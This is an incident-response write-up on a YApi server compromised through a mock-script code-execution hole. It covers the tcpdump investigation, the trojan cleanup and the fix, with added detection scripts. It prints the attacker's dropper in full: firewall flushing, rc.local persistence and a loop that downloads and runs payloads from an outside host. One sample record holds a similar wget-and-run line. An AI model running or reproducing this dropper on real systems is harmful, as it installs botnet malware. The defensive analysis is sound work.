YApi vulnerability: dealing with the planted trojan program chongfu.sh
2022-07-28 06:47:00 【opreator.ke】
1. 【Background】 The server network was sluggish and kept sending packets outward, which eventually brought down the server's network connectivity.
2. 【Investigation】
2.1 Logged in to the affected server; `top` showed no abnormal CPU or memory usage.
2.2 Checked the TCP connection states:
netstat -n | awk '/^tcp/ {++S[$NF]} END {for(a in S) print a, S[a]}'
Nothing abnormal: the per-state connection counts all looked normal.
2.3 Packet capture and analysis with tcpdump
tcpdump -i enp3s0
14:53:48.496584 IP smtp-5.etopbags.info.dnp > 218.46046: Flags [R.], seq 0, ack 3002381902, win 0, length 0
14:53:48.496825 IP 218.46048 > smtp-5.etopbags.info.dnp: Flags [S], seq 361520383, win 29200, options [mss 1460,sackOK,TS val 2043795 ecr 0,nop,wscale 7], length 0
14:53:48.536622 IP smtp-5.etopbags.info.dnp > 218.46048: Flags [R.], seq 0, ack 361520384, win 0, length 0
14:53:48.536876 IP 218.46050 > smtp-5.etopbags.info.dnp: Flags [S], seq 914055455, win 29200, options [mss 1460,sackOK,TS val 2043836 ecr 0,nop,wscale 7], length 0
14:53:48.574447 IP smtp-5.etopbags.info.dnp > 218.46050: Flags [R.], seq 0, ack 914055456, win 0, length 0
14:53:48.574644 IP 218.46052 > smtp-5.etopbags.info.dnp: Flags [S], seq 908877290, win 29200, options [mss 1460,sackOK,TS val 2043873 ecr 0,nop,wscale 7], length 0
14:53:48.609252 IP smtp-5.etopbags.info.dnp > 218.46052: Flags [R.], seq 0, ack 908877291, win 0, length 0
14:53:48.609342 IP 218.46054 > smtp-5.etopbags.info.dnp: Flags [S], seq 3724761583, win 29200, options [mss 1460,sackOK,TS val 2043908 ecr 0,nop,wscale 7], length 0
14:53:48.646988 IP smtp-5.etopbags.info.dnp > 218.46054: Flags [R.], seq 0, ack 3724761584, win 0, length 0
14:53:48.647066 IP 218.46056 > smtp-5.etopbags.info.dnp: Flags [S], seq 1209043513, win 29200, options [mss 1460,sackOK,TS val 2043946 ecr 0,nop,wscale 7], length 0
14:53:48.681432 IP smtp-5.etopbags.info.dnp > 218.46056: Flags [R.], seq 0, ack 1209043514, win 0, length 0
14:53:48.681516 IP 218.46058 > smtp-5.etopbags.info.dnp: Flags [S], seq 1382946052, win 29200, options [mss 1460,sackOK,TS val 2043980 ecr 0,nop,wscale 7], length 0
14:53:48.722538 IP smtp-5.etopbags.info.dnp > 218.46058: Flags [R.], seq 0, ack 1382946053, win 0, length 0
14:53:48.722614 IP 218.46060 > smtp-5.etopbags.info.dnp: Flags [S], seq 572251828, win 29200, options [mss 1460,sackOK,TS val 2044021 ecr 0,nop,wscale 7], length 0
14:53:48.759004 IP smtp-5.etopbags.info.dnp > 218.46060: Flags [R.], seq 0, ack 572251829, win 0, length 0
14:53:48.759089 IP 218.46064 > smtp-5.etopbags.info.dnp: Flags [S], seq 3797818250, win 29200, options [mss 1460,sackOK,TS val 2044058 ecr 0,nop,wscale 7], length 0
Here is the anomaly: the host keeps opening new connections (one SYN per line, from an incrementing local source port) to the external host smtp-5.etopbags.info, and every attempt is immediately refused with RST.
2.4 The capture shows the destination port is 20000 (tcpdump prints it by its /etc/services name, dnp); the host has been sending to it non-stop.
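The eyeballing done in 2.3 and 2.4 can be scripted. The following is an added example (not from the original post): it reduces tcpdump's text output to one line per destination with the number of SYN-only packets sent to it and the number of RST replies received from it, so a host that keeps dialling one external endpoint stands out. The sample input is built from the capture lines above plus one invented SSH packet to show unrelated traffic is ignored.

```shell
#!/bin/sh
# Added example, not from the original post: summarise a tcpdump text capture as
# "<dst host.port> <SYNs sent to it> <RSTs received from it>". Works on plain
# `tcpdump -i enp3s0` output (service names, as above) or `tcpdump -nn` output.

# Constructed sample: four SYN/RST pairs from the capture above plus one
# unrelated (invented) SSH data packet that must not be counted.
SAMPLE_CAPTURE='14:53:48.496825 IP 218.46048 > smtp-5.etopbags.info.dnp: Flags [S], seq 361520383, win 29200, options [mss 1460,sackOK,TS val 2043795 ecr 0,nop,wscale 7], length 0
14:53:48.536622 IP smtp-5.etopbags.info.dnp > 218.46048: Flags [R.], seq 0, ack 361520384, win 0, length 0
14:53:48.536876 IP 218.46050 > smtp-5.etopbags.info.dnp: Flags [S], seq 914055455, win 29200, options [mss 1460,sackOK,TS val 2043836 ecr 0,nop,wscale 7], length 0
14:53:48.574447 IP smtp-5.etopbags.info.dnp > 218.46050: Flags [R.], seq 0, ack 914055456, win 0, length 0
14:53:48.574644 IP 218.46052 > smtp-5.etopbags.info.dnp: Flags [S], seq 908877290, win 29200, options [mss 1460,sackOK,TS val 2043873 ecr 0,nop,wscale 7], length 0
14:53:48.609252 IP smtp-5.etopbags.info.dnp > 218.46052: Flags [R.], seq 0, ack 908877291, win 0, length 0
14:53:48.609342 IP 218.46054 > smtp-5.etopbags.info.dnp: Flags [S], seq 3724761583, win 29200, options [mss 1460,sackOK,TS val 2043908 ecr 0,nop,wscale 7], length 0
14:53:48.646988 IP smtp-5.etopbags.info.dnp > 218.46054: Flags [R.], seq 0, ack 3724761584, win 0, length 0
14:53:49.101010 IP 218.46100 > 10.0.0.5.ssh: Flags [P.], seq 1:37, ack 1, win 229, length 36'

# syn_summary: read tcpdump text on stdin, print one line per destination:
#   <dst host.port> <SYN-only packets we sent to it> <RST+ACK replies it sent back>
syn_summary() {
  awk '
    $2 == "IP" && $4 == ">" && $6 == "Flags" {
      dst = $5; sub(/:$/, "", dst)     # "host.port:" -> "host.port"
      src = $3
      if ($7 == "[S],")  syn[dst]++    # SYN without ACK: this host initiated
      if ($7 == "[R.],") rst[src]++    # RST+ACK from the remote: refused
    }
    END { for (d in syn) printf "%s %d %d\n", d, syn[d], rst[d] + 0 }'
}

# flag_beacons [MIN]: from syn_summary output on stdin, print destinations that
# received at least MIN SYNs (default 3) during the capture.
flag_beacons() {
  awk -v min="${1:-3}" '$2 >= min { print $1 }'
}

# Stand-alone run on the constructed sample. On a live box, capture only SYN/RST
# packets for a while and raise the threshold, e.g.:
#   tcpdump -nn -l -i enp3s0 -c 500 'tcp[tcpflags] & (tcp-syn|tcp-rst) != 0' | syn_summary | flag_beacons 20
printf '%s\n' "$SAMPLE_CAPTURE" | syn_summary | flag_beacons 3
```

On the sample this prints only smtp-5.etopbags.info.dnp; the SSH packet carries PSH+ACK and is not counted. A destination with many SYNs and an equal number of RSTs is exactly the pattern seen above: the remote end is down or refusing, and the local process retries without pause.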
2.5 Check what is bound to port 20000:
netstat -lan | grep 20000
Looking up the process behind this port showed it was a program under the yapi directory:
/root/my-yapi/20000 was the process running.
Entering that directory revealed abnormal files.
3. 【Trojan cleanup】
Followed this cleanup write-up:
https://zhuanlan.zhihu.com/p/90792899
3.1 Kill the process: ps aux | grep "20000" | grep -v grep | awk '{print $2}' | xargs kill -9
3.2 Remove the autostart entry: vim /etc/rc.local and delete the line sh /etc/chongfu.sh &
3.3 Delete the script: rm -rf /etc/chongfu.sh /tem/chongfu.sh
3.4 Change the login password: passwd
3.5 Reboot: reboot
Good grief. Follow-up showed this trojan to be particularly stubborn:
it disguised itself under several system file names and was tied to several scheduled scripts that kept re-creating it. Only after a complete cleanup was it finally dealt with.
4. 【Locating the vulnerability】
4.1 Why were trojan files created inside the yapi directory?
4.2 This server sits on the intranet, and both passwords and ports are covered by security policy.
4.3 Started tracing the problem: logged in to the yapi administrator account and found a large number of abnormal registered users.
Went straight to GitHub to check,
and then found this:
http://www.hackdig.com/07/hack-404188.htm
Because there is no patch for the YAPI remote code execution 0-day, the BillGates and Mirai botnet trojan families mainly use the controlled hosts for DDoS attacks, to leave backdoors, or to mine. Tencent security experts suggest that government and enterprise organizations running the YAPI interface management platform take the following measures as soon as possible to mitigate the risk:
1. Deploy Tencent Cloud Firewall to intercept threats in real time;
2. Close the YAPI user registration function to stop attackers from registering;
3. Delete maliciously registered users to prevent attackers from adding mock scripts again;
4. Delete malicious mock scripts so they cannot be triggered by access again;
5. Roll the server back to a snapshot, which clears the backdoor implanted through the exploit.
5. 【yapi fix】
5.1 First of all, removed the public internet address.
5.2 Following the GitHub advice, disabled user registration.
6. 【Trojan program review】
6.1 The attacker first uses the registration function to create an account; only after logging in can a custom mock script be defined.
6.2 Malicious commands are embedded in the mock script, and they are executed when a user request to the mock interface triggers the script.
That is how the scene above came about.
6.3 The trojan script
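Item 4 of the advice above (delete the malicious mock scripts) needs a way to find them. The following is an added example, not from the original post or from the YApi project: it triages exported mock scripts for the command-execution pattern described in 6.1 and 6.2. It assumes (not stated on the page) that YApi stores each interface's script in a `mock_script` field of the `interface` collection and that the collection has been dumped as newline-delimited JSON, e.g. with `mongoexport --db yapi --collection interface`; the database name and the marker list are assumptions, and the three records are constructed.

```shell
#!/bin/sh
# Added example, not from the original post: triage YApi mock scripts exported
# as newline-delimited JSON and print the id and path of any script that
# contains a marker of Node sandbox escape, module loading or shell execution.
# Assumptions: field name `mock_script`, mongoexport-style `{"_id":{"$oid":...}}`.

# Markers (assumed, typical of the "malicious command in a mock script" pattern):
# reaching the host process from the vm sandbox, loading modules, spawning a
# shell, or fetching a second stage. A rough first pass, not a full parser.
DANGER_RE='constructor\.constructor|process\.mainModule|child_process|require\(|execSync|spawn|wget |curl |/bin/sh|/bin/bash|base64'

# Constructed sample export: one benign script, one dropper, one empty script.
SAMPLE_EXPORT=$(cat <<'EOF'
{"_id":{"$oid":"60e3f1a2b5c4d3e2f1a0b9c8"},"path":"/api/user/info","mock_script":"mockJson.code = 0;\nmockJson.data.name = \"demo\";"}
{"_id":{"$oid":"60e3f1a2b5c4d3e2f1a0b9c9"},"path":"/api/health","mock_script":"require('child_process').execSync('wget http://203.0.113.10/x.sh -O /tmp/x.sh && sh /tmp/x.sh');"}
{"_id":{"$oid":"60e3f1a2b5c4d3e2f1a0b9ca"},"path":"/api/ping","mock_script":""}
EOF
)

# extract_json_string KEY: read one JSON line on stdin and print the raw value
# of "KEY":"..." (escapes are kept as written, which is enough for grep).
extract_json_string() {
  awk -v key="\"$1\":\"" '
  {
    i = index($0, key); if (!i) next
    s = substr($0, i + length(key)); out = ""
    for (j = 1; j <= length(s); j++) {
      c = substr(s, j, 1)
      if (c == "\\") { out = out c substr(s, j + 1, 1); j++; continue }  # keep \x pairs
      if (c == "\"") break                                               # unescaped quote ends it
      out = out c
    }
    print out
  }'
}

# mock_script_is_dangerous: exit 0 if the script text on stdin matches DANGER_RE.
mock_script_is_dangerous() {
  grep -qE "$DANGER_RE"
}

# suspicious_mock_scripts: for each JSON record on stdin with a non-empty
# mock_script, print "<oid>  <path>" when the script looks dangerous.
suspicious_mock_scripts() {
  while IFS= read -r line; do
    script=$(printf '%s\n' "$line" | extract_json_string mock_script)
    [ -n "$script" ] || continue
    if printf '%s\n' "$script" | mock_script_is_dangerous; then
      id=$(printf '%s\n' "$line" | extract_json_string '$oid')
      path=$(printf '%s\n' "$line" | extract_json_string path)
      printf '%s  %s\n' "${id:-?}" "${path:-?}"
    fi
  done
}

# Stand-alone run on the constructed export; on a real dump:
#   mongoexport --db yapi --collection interface | suspicious_mock_scripts
printf '%s\n' "$SAMPLE_EXPORT" | suspicious_mock_scripts
```

On the sample only the /api/health record is reported. The marker list errs on the side of false positives (a legitimate script may well contain `base64`), which is the right trade-off during an incident: every hit is reviewed by hand before it is deleted, and the benign `mockJson` assignments pass untouched.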
#!/bin/bash
#Welcome like-minded friends to come to exchange.
#We are a group of people who have a dream.
# qun:10776622
# 2016-06-14
# Flush all firewall rules and switch iptables off so nothing blocks the payloads' traffic
iptables -F
/etc/init.d/iptables stop
chkconfig iptables off
# Persistence: append the payload launch commands to /etc/rc.local so they run at every boot
echo "chmod +x /tmp/X64" >> /etc/rc.local
echo "/tmp/X64 SHX64" >> /etc/rc.local
echo "chmod +x /tmp/ShouHu" >> /etc/rc.local
echo "/tmp/ShouHu SHX64" >> /etc/rc.local
# Payload names and download URLs (the hfs_ prefix suggests an HTTP File Server on 27.50.49.61:2131).
# Note: as written, the unquoted assignments make bash treat SHX64 as a command to run
# with m (resp. script) set only for it; the rest of the script then sees m and script empty.
m=X64 SHX64
script=ShouHu SHX64
hfs_m=http://27.50.49.61:2131/X64
hfs_s=http://27.50.49.61:2131/ShouHu
rm -f /tmp/$m*
# Watchdog loop: every 10 s make sure both payloads are running; if one is not,
# run it from /tmp, re-downloading it first when the file has been deleted
while true
do
ps aux | grep $m | grep -v grep
if [ $? -eq 0 ];then
sleep 10
else
ls -l /tmp/$m
if [ $? -eq 0 ];then
/tmp/$m
else
cd /tmp/;wget $hfs_m ; chmod a+x $m;/tmp/$m
fi
fi
ps aux | grep $script | grep -v grep
if [ $? -eq 0 ];then
sleep 10
else
ls -l /tmp/$script
if [ $? -eq 0 ];then
/tmp/$script
else
cd /tmp;wget $hfs_s ; chmod a+x $script;/tmp/$script
fi
fi
done
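The script above explains why the cleanup in section 3 had to be repeated: killing the process and deleting chongfu.sh is not enough while rc.local still launches the payloads and a watchdog loop re-downloads anything that goes missing. The following is an added example, not from the original post or from the cleanup write-up it links, that checks for exactly those artifacts: the rc.local lines the dropper appends, the files it writes, executables left in /tmp, and sockets to its download host. File locations are parameters, so it can also be run against an rc.local copied off the box. The indicator list is taken from the script above; the rc.local used in the demo is constructed.

```shell
#!/bin/sh
# Added example, not from the original post: verify that the persistence the
# dropper script installs is really gone before declaring the box clean.

# Indicators copied from the script above (files it writes, host it downloads from).
IOC_FILES='/tmp/X64 /tmp/ShouHu /etc/chongfu.sh /tmp/chongfu.sh'
IOC_HOST='27.50.49.61'
# rc.local lines that run or chmod something in a world-writable directory, or
# run an /etc/*.sh via "sh" (the `sh /etc/chongfu.sh &` entry removed in step 3.2).
SUSPECT_RE='/tmp/|/dev/shm/|/var/tmp/|(^|[[:space:]])sh[[:space:]]+/etc/[^[:space:]]+\.sh'

# rc_local_suspects FILE: print matching lines with line numbers; exit 1 if none.
rc_local_suspects() {
  grep -nE "$SUSPECT_RE" "$1"
}

# clean_rc_local FILE: drop the suspect lines, keeping FILE.bak as evidence.
clean_rc_local() {
  cp "$1" "$1.bak"
  grep -vE "$SUSPECT_RE" "$1.bak" > "$1" || :
}

# present_iocs [ROOT]: print each IOC path that exists under ROOT
# (empty ROOT = the live system; a mounted image works too).
present_iocs() {
  for f in $IOC_FILES; do
    [ -e "${1:-}$f" ] && echo "${1:-}$f"
  done
  return 0
}

# tmp_executables [DIR]: regular executable files directly in DIR (default /tmp).
# The dropper chmod +x's its payloads there, so this should normally print nothing.
tmp_executables() {
  find "${1:-/tmp}" -maxdepth 1 -type f -perm -u+x 2>/dev/null
}

# c2_sockets: established TCP sockets to the download host (live system only).
c2_sockets() {
  { command -v ss >/dev/null 2>&1 && ss -ntp || netstat -ntp; } 2>/dev/null | grep -F "$IOC_HOST" || :
}

# Stand-alone demo on a constructed rc.local mirroring what the script echoes.
demo_dir=$(mktemp -d)
cat > "$demo_dir/rc.local" <<'EOF'
#!/bin/sh -e
touch /var/lock/subsys/local
chmod +x /tmp/X64
/tmp/X64 SHX64
sh /etc/chongfu.sh &
exit 0
EOF
echo "suspect lines before cleanup:"; rc_local_suspects "$demo_dir/rc.local"
clean_rc_local "$demo_dir/rc.local"
echo "rc.local after cleanup:"; cat "$demo_dir/rc.local"
rm -rf "$demo_dir"
```

On a live system run `rc_local_suspects /etc/rc.local`, `present_iocs`, `tmp_executables` and `c2_sockets` after the kill in step 3.1 and again after the reboot in step 3.5; if any of them still prints something, the watchdog or another persistence mechanism (the post mentions several scheduled scripts) has survived. Kill the loop before deleting files: the script above re-downloads /tmp/X64 and /tmp/ShouHu within ten seconds of their removal.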